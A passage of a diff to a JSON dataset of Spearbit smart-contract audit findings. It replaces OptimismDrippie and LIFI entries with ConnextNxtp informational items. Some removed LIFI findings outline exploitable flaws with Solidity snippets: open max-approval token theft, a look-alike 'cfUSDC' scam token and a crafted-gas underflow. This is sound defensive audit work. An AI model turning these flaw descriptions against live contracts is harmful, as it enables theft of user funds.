"labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Increment In The For Loop Post Condition In An Unchecked Block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "This is only relevant if you are using the default solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "title": "Incorrect comment about relation between zero amount and asset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _- xcall() reverts when zero address is specified for _asset on a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment if amount is 0, _asset also has to be the zero address which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount);", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DripState.count Location and Use", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with Checks, Effects, Interactions con- vention.", + "title": "New Connector needs to be deployed if AMB changes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The AMB address is configured to be immutable. If any of the chain's AMB changes, the Connector needs to be deployed. /** * @notice Address of the AMB on this domain. */ address public immutable AMB;", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Type Checking Foregone on DripCheck", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Passing params as bytes makes for a flexible DripCheck, however, type checking is lost.", + "title": "Functions should be renamed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The following functions should be renamed to be aligned with the naming convention of the fxPortal contracts. OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Confirm Blind ERC721 Transfers are Intended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk but in this case the function is restricted to onlyOwner.", + "title": "Twice function aggregate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... ,! } RootManager.sol 120 function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Code Contains Empty Blocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Its best practice that when there is an empty block, to add a comment in the block explaining why its empty. While not technically errors, they can cause confusion when reading code.", + "title": "Careful when using _removeAssetId()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _removeAssetId() removes an assets. Although it is called via authorized functions, mistakes could be made. It there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and allowed in the StableSwap. If so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Code Structure Deviates From Best-Practice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The best-practice layout for a contract should follow this order: State variables. Events. Modifiers. Constructor. Functions. Function ordering helps readers identify which functions they can call and find constructor and fallback functions easier. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if ex- ists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events.", + "title": "Unused import IAavePool in InboxFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Contract InboxFacet imports IAavePool, however it doesn't use it. import {IAavePool} from \"../interfaces/IAavePool.sol\";", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Missing or Incomplete NatSpec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.", + "title": "Use IERC20Metadata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "interface. pelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Checking Boolean Against Boolean", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "executable returns a boolean in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails in which case false will never be returned.", + "title": "Generic name of proposedTimestamp()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function proposedTimestamp() has a very generic name. As there are other Timestamp func- tions this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Drippie.executable Never Returns false Only true or Reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "executable(string memory _name) public view returns (bool). The executable implemented in the Drippie contract has the following signature From the signature and the natspec documentation @return True if the drip is executable, false other- wise. Without reading the code, a user/developer would expect that the function returns true if all the checks passes otherwise false but in reality the function will always return true or revert. Because of this behavior, a reverting drip that do not pass the requirements inside executable will never revert with the message present in the following code executed by the drip function require( executable(_name) == true, \"Drippie: drip cannot be executed at this time, try again later\" );", + "title": "Two different nonces", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces;", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Drippie Use Case Notes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, weve noted that drips support: Sending eth External function calls with fixed params Preconditions Examples include, conditionally transferring eth or tokens. Calling an admin function iff preconditions are met. Drips do not support: Updating the drip contract storage Altering params Postconditions Examples include, vesting contracts or executing Uniswap swaps based on recent moving averages (which are not without their own risks). Where dynamic params or internal accounting is needed, a separate contract needs to be paired with the drip.", + "title": "Tips to optimize rootWithCtx", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... ,! }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Augment Documentation for dripcheck.check Indicating Precondition Check Only Performed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Before executing the whole batch of actions the drip function call executable that check if the drip can be executed. Inside executable an external contract is called by this instruction require( state.config.dripcheck.check(state.config.checkparams), \"Drippie: dripcheck failed so drip is not yet ready to be triggered\" ); Optimism provided some examples like checking if a target balance is below a specific threshold or above that threshold, but in general, the dripcheck.check invocation could perform any kind of checks. The important part that should be clear in the natspec documentation of the drip function is that that specific check is performed only once before the execution of the bulk of actions.", + "title": "Use delete", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete. So using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Considerations on the drip state.last and state.config.interval values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "When the drip function is called by an external actor, the executable is executed to check if the drip meets all the needed requirements to be executed. The only check that is done regarding the drip state.last and state.config.interval is this require( state.last + state.config.interval <= block.timestamp, \"Drippie: drip interval has not elapsed since last drip\" ); The state.time is never really initialized when the create function is called, this means that it will be automatically initialized with the default value of the uint256 type: 0. Consideration 1: Drips could be executed as soon as created Depending on the value set to state.config.interval the executables logic implies that as soon as a drip is created, the drip can be immediately (even in the same transaction) executed via the drip function. Consideration 2: A very high value for interval could make the drip never executable block.timestamp represents the number of seconds that passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie want to create a \"one shot\" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drips status to ARCHIVED) he/she should be aware that the max value that he/she can use for the interval is at max block.timestamp. This mean that the second time the drip can be executed is after block.timestamp seconds have been passed. If, for example, the owner create right now a drip with interval = block.timestamp it means that after the first execution the same drip could be executed after ~52 years (~2022-1970).", + "title": "replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": " When abi.encodeWithSignature is used the compiler does not check for mistakes in the signature or the types provided. When abi.encodeWithSelector is used the compiler does not check for parameter type inconsistencies.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Support ERC1155 in AssetReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver support ERC20 and ERC721 interfaces but not ERC1155.", + "title": "setAggregators is missing checks against address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setAggregators does not check if tokenAddresses[i] or sources[i] is address(0).", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Reorder DripStatus Enum for Clarity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The current implementation of Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)) and when it gets activated its status is changed to ACTIVE (equal to uint8(1)) So, the status change from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand.", + "title": "setAggregators can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setAggregators does not check if tokenAddresses length is equal to sources to revert early.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "_gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The caller (i.e. contract owner) can control desired amount of gas at the transaction level.", + "title": "Event is not emitted when an important action happens on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "No event is emitted when an important action happens on-chain.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Licensing Conflict on Inherited Dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Solmate contracts are AGPL Licensed which is incompatible with the MIT License of Drippie related contracts.", + "title": "Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It is always assumed last + 1 >= first. It would be great to add unit/fuzz tests to check for this invariant. Adding these tests", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Rename Functions for Clarity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "status The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function, based on the name, is not obvious at first sight and could confuse a user into believing that its a view function to retrieve the status of a drip instead of mutating its status. executable The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed.", + "title": "Consider using prefix(...) instead of slice(0,...)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "tokenId() calls TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Owner Has Permission to Drain Value from Drippie Contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Scenario 1 Owner may create arbitrary drips, including a drip to send all funds to themselves. Scenario 2 AssetReceiver permits owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. Scenario 3 Owner may execute arbitrary calls. Transactor.CALL function is a function that allows the owner of the contract to execute a \"general purpose\" low- level call. function CALL( address _target, bytes memory _data, uint256 _gas, uint256 _value ) external payable onlyOwner returns (bool, bytes memory) { return _target.call{ gas: _gas, value: _value }(_data); } The function will transfer _value ETH present in the contract balance to the _target address. The function is also payable and this mean that the owner can send along with the call some funds. Test example showcasing the issue: 23 function test_transactorCALLAllowOwnerToDrainDrippieContract() public { bool success; vm.deal(deployer, 0 ether); vm.deal(bob, 0 ether); vm.deal(address(drippie), 1 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them (success, ) = drippie.CALL{value: 0 ether}(bob, \"\", 100000, 1 ether); assertEq(success, true); assertEq(address(drippie).balance, 0 ether); assertEq(bob.balance, 1 ether); }", + "title": "Elaborate TypedMemView encoding in comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Receiver doesn't always reset allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _swapAndCompleteBridgeTokens() of Receiver reset the approval to the executor at the end of an ERC20 transfer. However it there is insufficient gas then the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; // no safeApprove 0 } try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); } }", + "title": "Remove Curve StableSwap paper URL", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "www.curve.fi/stableswap-paper.pdf The current working URL is curve.fi/files/stableswap-paper.pdf. to Curve StableSwap paper referenced in comments Link is no longer active:", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "CelerIMFacet incorrectly sets RelayerCelerIM as receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "When assigning a bytes memory variable to a new variable, the new variable points to the same memory location. Changing any one variable updates the other variable. Here is a PoC as a foundry test function testCopy() public { Pp memory x = Pp({ a: 2, b: address(2) }); Pp memory y = x; y.b = address(1); assertEq(x.b, y.b); } Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This makes the receiver on the destination chain to be the relayer address. // case 'yes': bridge + dest call - send to relayer ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; bridgeDataAdjusted.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( _bridgeData.receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData );", + "title": "Missing Validations in AmplificationUtils.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1. If initialAPrecise=futureAPrecise then there will not be any ramping. 2. In stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp since once current timestamp has reached futureATime, futureAprice will be returned al- ways.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Max approval to any address is possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen. function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { ... LibAsset.maxApproveERC20(..., type(uint256).max); ... }", + "title": "Incorrect PriceSource is returned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Price Source is returned incorrectly in case of stale prices as shown below 1. getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0. uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now contract tries to retrieve price from oracle. In case the price is outdated, the returned price will again be 0 and source would be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 128 4. Assuming v1PriceOracle is not yet set, contract will simply return the price and source which in this case is 0, PriceSource.CHAINLINK. In this case amount is correct but source is not correct. return (tokenPrice, uint256(source));", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Return value of low-level .call() not checked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Low-level primitive .call() doesn't revert in caller's context when the callee reverts. value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. If receiver reverts, this can lead to locked ETH in Receiver contract.", + "title": "PriceSource.DEX is never used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The enum value DEX is never used in the contract and can be removed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Limits in LIFuelFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The facet LIFuelFacet is meant for small amounts, however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { serviceFeeCollector.collectNativeGasFees{...}(...); } else { LibAsset.maxApproveERC20(...); serviceFeeCollector.collectTokenGasFees(...); ... } }", + "title": "Incorrect comment about handleOutgoingAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment is incorrect as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. */ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal {", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "The optimal version _depositAndSwap() isn't always used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _- nativeReserve that is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left. function _depositAndSwap(...) ... // 4 parameter version /// @param _nativeReserve Amount of native token to prevent from being swept back to the caller function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version", + "title": "SafeMath is not required for Solidity 0.8.x", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "setContractOwner() is insufficient to lock down the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. However, the contract owner can still be changed if there happens to be a pendingOwner. In that case confirmOwnershipTransfer() can still change the contract owner. function transferOwnershipToZeroAddress() external { // transfer ownership to 0 address LibDiamond.setContractOwner(address(0)); } function setContractOwner(address _newOwner) internal { DiamondStorage storage ds = diamondStorage(); address previousOwner = ds.contractOwner; ds.contractOwner = _newOwner; emit OwnershipTransferred(previousOwner, _newOwner); } function confirmOwnershipTransfer() external { Storage storage s = getStorage(); address _pendingOwner = s.newOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner); LibDiamond.setContractOwner(_pendingOwner); s.newOwner = LibAsset.NULL_ADDRESS; }", + "title": "Use a deadline check modifier in ProposedOwnable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted out in a modifier for readability.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Receiver does not verify address from the originator chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Receiver contract is designed to receive the cross-chain call from libDiamond address on the destination chain. However, it does not verify the source chain address. An attacker can build a malicious _- callData. An attacker can steal funds if there are left tokens and there are allowances to the Executor. Note that the tokens may be lost in issue: \"Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract\". And there may be allowances to Executor in issue \"Receiver doesn't always reset allowance\"", + "title": "Use ExcessivelySafeCall in SpokeConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The low-level call code highlighted code above looks to be copied from ExcessivelySafeCall.sol. replacing this low-level call with the function call ExcessivelySafe- Consider", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Receiver contract is designed to gracefully return the funds to users. It reserves the gas for recovering gas before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258 contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership { // ... if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(\"\"); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(\"\"); } // ... } 10 The gasleft() returns the remaining gas of a call. It is continuously decreasing. The second query of gasleft() is smaller than the first query. Hence, if the attacker tries to relay the transaction with a carefully crafted gas where gasleft() >= _recoverGas at the first quiry and gasleft() - _recoverGas reverts. This results in the token loss in the Receiver contract.", + "title": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use of name to identify a token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "startBridgeTokensViaCelerIM() uses the token name to identify cfUSDC token. Another token with the same name can pass this check. An attacker can create a scam token with the name \"cfUSDC\" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridge- Data.sendingAssetId, CelerIMFacet will transfer WETH. 11 if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked((\"cfUSDC\"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); }", + "title": "The constant expression for EMPTY_HASH can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "EMPTY_HASH is a constant with a value equal to: 